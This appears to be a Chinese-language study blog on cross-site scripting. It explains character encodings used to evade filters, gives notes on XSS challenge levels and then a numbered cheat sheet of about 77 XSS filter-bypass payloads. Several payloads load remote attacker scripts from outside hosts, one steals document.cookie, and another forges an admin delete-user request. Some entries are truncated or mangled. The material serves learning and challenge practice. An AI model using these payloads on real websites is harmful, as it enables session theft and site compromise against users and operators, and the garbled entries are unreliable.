<h5 id="unicode-编码"><a href="#unicode-编码" class="headerlink" title="unicode 编码"></a>unicode 编码</h5><p>Unicode 有 1114112 个码位，也就是说可以分配 1114112 个字符。Unicode 编码的字符以 %u 为前缀，后面是这个字符的十六进制 unicode 的码点。</p>
<p>Unicode 编码之所以被本文提到，因为有的站点过滤了某些字符串的话，但是发现这个站点在后端验证字符串的时候，识别 unicode 编码，那我们就可以把我们的攻击代码来改成 unicode 编码形式，就可以绕过站点的过滤机制了</p>
<h5 id="CSS-编码"><a href="#CSS-编码" class="headerlink" title="CSS 编码"></a>CSS 编码</h5><p>这个不是太常用。就是 / 斜杠加上 1-6 位十六进制</p>
<p>之前在 IE5 之前都可以用 expression 来调用 js 时，这个编码很有用。 现在大多都是用于 CSS 小图标。</p>
<p>用一个反斜线()后面跟1~6位的十六进制数字，例如e可以编码为“\65”或“65”或“00065”</p>
<h5 id="JS编码：js提供了四种字符编码的策略，"><a href="#JS编码：js提供了四种字符编码的策略，" class="headerlink" title="JS编码：js提供了四种字符编码的策略，"></a>JS编码：js提供了四种字符编码的策略，</h5><p>1、三个八进制数字，如果不够个数，前面补0，例如“e”编码为“\145”</p>
<p>2、两个十六进制数字，如果不够个数，前面补0，例如“e”编码为“\x65”</p>
<p>3、四个十六进制数字，如果不够个数，前面补0，例如“e”编码为“\u0065”</p>
<p>4、对于一些控制字符，使用特殊的C类型的转义风格（例如\n和\r）</p>
<h5 id="复合编码："><a href="#复合编码：" class="headerlink" title="复合编码："></a>复合编码：</h5><p>所谓复合编码，也就是说输出的内容输出在多个环境中，例如</p>
<td onclick="”openUrl(add.do?userName=’<%=value%">’);”>11</td>

<p>value的内容首先出现在一个URL中，这个URL在一段javascript总，而javascript代码又是html的一部分。所以解码的顺序就是HTML解码–&gt;js解码–&gt;url解码，那么正确的编码顺序就应该是url编码–&gt;js编码–&gt;html编码。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">background-color:salmon;input:expression((<span class="built_in">window</span>.x==<span class="number">1</span>)?<span class="string">''</span>:(<span class="built_in">window</span>.x=<span class="number">1</span>,alert(<span class="built_in">document</span>.domain)))</span><br><span class="line"> xss:expr<span class="comment">/*XSS*/</span>ession(alert(<span class="built_in">document</span>.domain));</span><br><span class="line"><span class="number">1.</span>style=<span class="string">"color:expression(alert(document.domain))"</span></span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> background:url(javascript:alert(<span class="string">'xss'</span>));</span><br><span class="line">   background:url(<span class="string">"javascript:alert(document.domain);"</span>);</span><br><span class="line"><span class="number">3.</span>xss:expression(alert(<span class="built_in">document</span>.domain));</span><br><span class="line">     &lt;img src=<span class="string">"#"</span>  style=<span class="string">"xss:expression(alert('xss'));"</span>&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">【<span class="number">5</span>】</span><br><span class="line">这一关开始是 flash xss 了，首先</span><br><span class="line">下载页面中的 flash，对源码进行分析，我用的</span><br><span class="line">是 JPEXS 这款工具。发现是 actionscript <span class="number">2.0</span>，</span><br><span class="line">首先定位 getURL 函数</span><br><span class="line"></span><br><span class="line">&lt;a href=<span class="string">"javascript:alert(document.domain)"</span>&gt;xss_by_SST&lt;<span class="regexp">/a&gt;</span></span><br><span class="line"><span class="regexp">arg01=version&amp;arg02=&lt;a href="javascript:alert(document.domain)"&gt;xss_by_SST&lt;/</span>a&gt;</span><br><span class="line">	</span><br><span class="line">arg01=id&amp;arg02=\<span class="string">"))&#125;catch(e)&#123;&#125;if(!self.a)self.a=!alert(document.cookie)//&amp;width&amp;heigh</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">document.write(location.hash.substring(1));</span></span><br><span class="line"><span class="string">的是利用 location.hash 获取 url 中 #后面的部分，这个 substring 是从第一个字符取到最后 --, </span></span><br><span class="line"><span class="string">#&lt;script&gt;alert()&lt;/script&gt; 就可以了。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">http://test.xss.tv/</span></span><br><span class="line"><span class="string">http://xss-quiz.int21h.jp</span></span><br><span class="line"><span class="string">http://prompt.ml/0</span></span><br><span class="line"><span class="string">https://alf.nu/alert1</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">xss challenge</span></span><br><span class="line"><span class="string">web_for_pentester完成</span></span><br></pre></td></tr></table></figure>

<h2 id="XSS跨站脚本攻击汇总"><a href="#XSS跨站脚本攻击汇总" class="headerlink" title="XSS跨站脚本攻击汇总"></a>XSS跨站脚本攻击汇总</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br></pre></td><td class="code"><pre><span class="line">(<span class="number">1</span>) 普通的 XSS JavaScript 注入</span><br><span class="line">&lt;SCRIPT SRC=http:<span class="comment">//3w.org/XSS/xss.js&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">2</span>) IMG 标签 XSS 使用 JavaScript 命令</span><br><span class="line">&lt;SCRIPT SRC=http:<span class="comment">//3w.org/XSS/xss.js&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">3</span>) IMG 标签无分号无引号</span><br><span class="line">&lt;IMG SRC=javascript:alert(‘XSS’)&gt;</span><br><span class="line"></span><br><span class="line">(<span class="number">4</span>) IMG 标签大小写不敏感</span><br><span class="line">&lt;IMG SRC=JaVaScRiPt:alert(‘XSS’)&gt;</span><br><span class="line"></span><br><span class="line">(<span class="number">5</span>) HTML 编码 (必须有分号)</span><br><span class="line">&lt;IMG SRC=javascript:alert(“XSS”)&gt;</span><br><span class="line">(<span class="number">6</span>) 修正缺陷 IMG 标签</span><br><span class="line">&lt;IMG “”<span class="string">"&gt;&lt;SCRIPT&gt;alert(“XSS”)&lt;/SCRIPT&gt;”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(7) formCharCode 标签 (计算器)</span></span><br><span class="line"><span class="string">&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(8) UTF-8 的 Unicode 编码 (计算器)</span></span><br><span class="line"><span class="string">&lt;IMG SRC=jav.. 省略..S')&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(9) 7 位的 UTF-8 的 Unicode 编码是没有分号的 (计算器)</span></span><br><span class="line"><span class="string">&lt;IMG SRC=jav.. 省略..S')&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(10) 十六进制编码也是没有分号 (计算器)</span></span><br><span class="line"><span class="string">&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61.. 省略..&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(11) 嵌入式标签，将 Javascript 分开</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(12) 嵌入式编码标签，将 Javascript 分开</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(13) 嵌入式换行符</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(14) 嵌入式回车</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(15) 嵌入式多行注入 JavaScript, 这是 XSS 极端的例子</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”javascript:alert(‘XSS‘)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(16) 解决限制字符 (要求同页面)</span></span><br><span class="line"><span class="string">&lt;script&gt;z=’document.’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’write(“‘&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’&lt;script’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’ src=ht’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’tp://ww’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’w.shell’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’.net/1.’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’js&gt;&lt;/sc’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;z=z+’ript&gt;”)’&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;eval_r(z)&lt;/script&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(17) 空字符</span></span><br><span class="line"><span class="string">perl -e ‘print “&lt;IMG SRC=java\0script:alert(\”XSS\”)&gt;”;’ &gt; out</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(18) 空字符 2, 空字符在国内基本没效果。因为没有地方可以利用</span></span><br><span class="line"><span class="string">perl -e ‘print “&lt;SCR\0IPT&gt;alert(\”XSS\”)&lt;/SCR\0IPT&gt;”;’ &gt; out</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(19) Spaces 和 meta 前的 IMG 标签</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”   javascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(20)Non-alpha-non-digit XSS</span></span><br><span class="line"><span class="string">&lt;SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(21)Non-alpha-non-digit XSS to 2</span></span><br><span class="line"><span class="string">&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(22)Non-alpha-non-digit XSS to 3</span></span><br><span class="line"><span class="string">&lt;SCRIPT/SRC=”http://3w.org/XSS/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(23) 双开括号</span></span><br><span class="line"><span class="string">&lt;&lt;SCRIPT&gt;alert(“XSS”);//&lt;&lt;/SCRIPT&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(24) 无结束脚本标记 (仅火狐等浏览器)</span></span><br><span class="line"><span class="string">&lt;SCRIPT SRC=http://3w.org/XSS/xss.js?&lt;B&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(25) 无结束脚本标记 2</span></span><br><span class="line"><span class="string">&lt;SCRIPT SRC=//3w.org/XSS/xss.js&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(26) 半开的 HTML/JavaScript XSS</span></span><br><span class="line"><span class="string">&lt;IMG SRC=”javascript:alert(‘XSS’)”</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(27) 双开角括号</span></span><br><span class="line"><span class="string">&lt;iframe src=http://3w.org/XSS.html &lt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(28) 无单引号 双引号 分号</span></span><br><span class="line"><span class="string">&lt;SCRIPT&gt;a=/XSS/</span></span><br><span class="line"><span class="string">alert(a.source)&lt;/SCRIPT&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(29) 换码过滤的 JavaScript</span></span><br><span class="line"><span class="string">\”;alert(‘XSS’);//</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(30) 结束 Title 标签</span></span><br><span class="line"><span class="string">&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(“XSS”);&lt;/SCRIPT&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(31)Input Image</span></span><br><span class="line"><span class="string">&lt;INPUT SRC=”javascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(32)BODY Image</span></span><br><span class="line"><span class="string">&lt;BODY BACKGROUND=”javascript:alert(‘XSS’)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(33) BODY 标签</span></span><br><span class="line"><span class="string">&lt;BODY(‘XSS’)&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(34)IMG Dynsrc</span></span><br><span class="line"><span class="string">&lt;IMG DYNSRC=”javascript:alert(‘XSS’)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(35)IMG Lowsrc</span></span><br><span class="line"><span class="string">&lt;IMG LOWSRC=”javascript:alert(‘XSS’)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(36)BGSOUND</span></span><br><span class="line"><span class="string">&lt;BGSOUND SRC=”javascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(37)STYLE sheet</span></span><br><span class="line"><span class="string">&lt;LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(38) 远程样式表</span></span><br><span class="line"><span class="string">&lt;LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(39) List-style-image (列表式)</span></span><br><span class="line"><span class="string">&lt;STYLE&gt;li &#123;list-style-image: url(“javascript:alert(‘XSS’)”);&#125;&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(40)IMG VBscript</span></span><br><span class="line"><span class="string">&lt;IMG SRC=’vbscript:msgbox(“XSS”)’&gt;&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(41) META 链接 url</span></span><br><span class="line"><span class="string">&lt;META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(42)Iframe</span></span><br><span class="line"><span class="string">&lt;IFRAME SRC=”javascript:alert(‘XSS’);”&gt;&lt;/IFRAME&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(43)Frame</span></span><br><span class="line"><span class="string">&lt;FRAMESET&gt;&lt;FRAME SRC=”javascript:alert(‘XSS’);”&gt;&lt;/FRAMESET&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(44)Table</span></span><br><span class="line"><span class="string">&lt;TABLE BACKGROUND=”javascript:alert(‘XSS’)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(45)TD</span></span><br><span class="line"><span class="string">&lt;TABLE&gt;&lt;TD BACKGROUND=”javascript:alert(‘XSS’)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(46)DIV background-image</span></span><br><span class="line"><span class="string">&lt;DIV STYLE=”background-image: none)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(47) DIV background-image 后加上额外字符 (1-32&amp;34&amp;39&amp;160&amp;8192-8&amp;13&amp;12288&amp;65279)</span></span><br><span class="line"><span class="string">&lt;DIV STYLE=”background-image: none)”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(48)DIV expression</span></span><br><span class="line"><span class="string">&lt;DIV STYLE=”width: expression_r(alert(‘XSS’));”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(49) STYLE 属性分拆表达</span></span><br><span class="line"><span class="string">&lt;IMG STYLE=”xss:expression_r(alert(‘XSS’))”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(50) 匿名 STYLE (组成：开角号和一个字母开头)</span></span><br><span class="line"><span class="string">&lt;XSS STYLE=”xss:expression_r(alert(‘XSS’))”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(51)STYLE background-image</span></span><br><span class="line"><span class="string">&lt;STYLE&gt;.XSS&#123;background-image:none”);&#125;&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(52) IMG STYLE 方式</span></span><br><span class="line"><span class="string">exppression(alert(“XSS”))’&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(53)STYLE background</span></span><br><span class="line"><span class="string">&lt;STYLE&gt;&lt;STYLE type=”text/css”&gt;BODY&#123;background:url(“javascript:alert(‘XSS’)”)&#125;&lt;/STYLE&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(54)BASE</span></span><br><span class="line"><span class="string">&lt;BASE HREF=”javascript:alert(‘XSS’);//”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(55) EMBED 标签，你可以嵌入 FLASH, 其中包涵 XSS</span></span><br><span class="line"><span class="string">&lt;EMBED SRC=”” &gt;&lt;/EMBED&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">(56) 在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码</span></span><br><span class="line"><span class="string">a=”get”;</span></span><br><span class="line"><span class="string">b=”URL(\”"</span>;</span><br><span class="line">c=”javascript:”;</span><br><span class="line">d=”alert(‘XSS’);\”)”;</span><br><span class="line">eval_r(a+b+c+d);</span><br><span class="line"></span><br><span class="line">(<span class="number">57</span>) XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上</span><br><span class="line">&lt;HTML xmlns:xss&gt;</span><br><span class="line">&lt;?<span class="keyword">import</span> namespace=”xss” implementation=”http:<span class="comment">//3w.org/XSS/xss.htc”&gt;</span></span><br><span class="line">&lt;xss:xss&gt;XSS&lt;<span class="regexp">/xss:xss&gt;</span></span><br><span class="line"><span class="regexp">&lt;/</span>HTML&gt;</span><br><span class="line"></span><br><span class="line">(<span class="number">58</span>) 如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用</span><br><span class="line">&lt;SCRIPT SRC=””&gt;<span class="xml"><span class="tag">&lt;/<span class="name">SCRIPT</span>&gt;</span></span></span><br><span class="line"></span><br><span class="line">(<span class="number">59</span>) IMG 嵌入式命令，可执行任意命令</span><br><span class="line">&lt;IMG SRC=”http:<span class="comment">//www.XXX.com/a.php?a=b”&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">60</span>) IMG 嵌入式命令 (a.jpg 在同服务器)</span><br><span class="line">Redirect <span class="number">302</span> /a.jpg http:<span class="comment">//www.XXX.com/admin.asp&amp;deleteuser</span></span><br><span class="line"></span><br><span class="line">(<span class="number">61</span>) 绕符号过滤</span><br><span class="line">&lt;SCRIPT a=”&gt;” SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">62</span>)</span><br><span class="line">&lt;SCRIPT =”&gt;” SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">63</span>)</span><br><span class="line">&lt;SCRIPT a=”&gt;” ” SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">64</span>)</span><br><span class="line">&lt;SCRIPT “a=’&gt;’” SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">65</span>)</span><br><span class="line">&lt;SCRIPT a=<span class="string">`&gt;`</span> SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">66</span>)</span><br><span class="line">&lt;SCRIPT a=”&gt;’&gt;” SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">67</span>)</span><br><span class="line">&lt;SCRIPT&gt;<span class="built_in">document</span>.write(“&lt;SCRI”);<span class="xml"><span class="tag">&lt;/<span class="name">SCRIPT</span>&gt;</span></span>PT SRC=”http:<span class="comment">//3w.org/xss.js”&gt;&lt;/SCRIPT&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">68</span>) URL 绕行</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//127.0.0.1/”&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">69</span>) URL 编码</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//3w.org”&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">70</span>) IP 十进制</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//3232235521″&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">71</span>) IP 十六进制</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//0xc0.0xa8.0×00.0×01″&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">72</span>) IP 八进制</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//0300.0250.0000.0001″&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">73</span>) 混合编码</span><br><span class="line">&lt;A HREF=”h</span><br><span class="line">tt p:<span class="comment">//6 6.000146.0×7.147/”"&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">74</span>) 节省 [http:]</span><br><span class="line">&lt;A HREF=”<span class="comment">//www.google.com/”&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">75</span>) 节省 [www]</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//google.com/”&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">76</span>) 绝对点绝对 DNS</span><br><span class="line">&lt;A HREF=”http:<span class="comment">//www.google.com./”&gt;XSS&lt;/A&gt;</span></span><br><span class="line"></span><br><span class="line">(<span class="number">77</span>) javascript 链接</span><br><span class="line">&lt;A HREF=”javascript:<span class="built_in">document</span>.location=’http:<span class="comment">//www.google.com/’”&gt;XSS&lt;/A&gt;</span></span><br><span class="line">（边学边整理的）</span><br></pre></td></tr></table></figure>

